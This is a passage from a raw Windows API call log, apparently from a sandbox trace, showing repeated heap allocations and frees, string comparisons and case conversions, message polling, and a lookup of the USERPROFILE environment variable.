RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0222.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0222.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0222.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0222.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0222.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1a) returned 0x2a77c10 [0222.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0222.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zxF6sHlM0JaF", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xF6sHlM0JaF", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F6sHlM0JaF", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0222.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6sHlM0JaF", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0222.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sHlM0JaF", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HlM0JaF", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lM0JaF", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0222.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0222.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0222.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0222.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0222.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0222.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0222.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0222.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0222.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0222.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0222.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0222.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0222.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0222.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0222.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0222.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0222.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0222.227] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0222.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0222.227] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0222.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0222.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0222.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0222.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a98 [0222.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0222.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0222.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0222.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0222.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0222.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0222.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0222.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0222.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0222.228] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0222.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0222.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0222.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0c8 [0222.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0222.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaee8 [0222.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0222.228] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0222.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0222.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0222.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0222.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0222.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0222.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0222.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0222.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0222.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0222.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0222.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0222.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0222.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0222.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0222.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854b00 [0222.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0222.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0222.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0222.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0222.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0222.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0222.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0222.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0222.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0222.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0222.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0222.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b18 [0222.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0222.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0222.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0222.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0222.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0222.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0222.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0222.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0222.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0222.229] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0222.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0222.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0222.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf78 [0222.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0222.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0222.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaea0 [0222.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0222.230] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0222.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0222.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0222.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0222.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0222.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0222.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0222.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0222.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0222.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0222.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0222.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0222.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0222.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0222.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0222.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0222.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854d58 [0222.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0222.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0222.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0222.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0222.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0222.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0222.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0222.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0222.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0222.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a68 [0222.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0222.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0222.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0222.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0222.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71af8 [0222.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0222.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0222.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0222.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0c8 [0222.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0222.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0222.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0222.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0222.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0222.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0222.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0222.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0222.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0222.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0222.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0222.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0222.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0222.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0222.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0222.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0222.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0222.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0222.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0222.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0222.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0222.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0222.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0222.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0222.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0222.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0222.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0222.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0222.232] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0222.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0222.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0222.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0222.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0222.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0222.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0222.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0222.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0222.233] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0222.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0222.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0222.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0222.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0222.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0222.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0222.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0222.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0222.233] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0222.233] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0222.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0222.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0222.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0222.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0222.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0222.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0222.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0222.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0222.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0222.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0222.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0222.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0222.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0222.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0222.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0222.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0222.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0222.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0222.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0222.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0222.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0222.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0222.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0222.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0222.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0222.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0222.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0222.234] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0222.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0222.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0222.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0222.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0222.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0222.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0222.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0222.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0222.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0222.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0222.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0222.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.235] RtlAllocateHeap 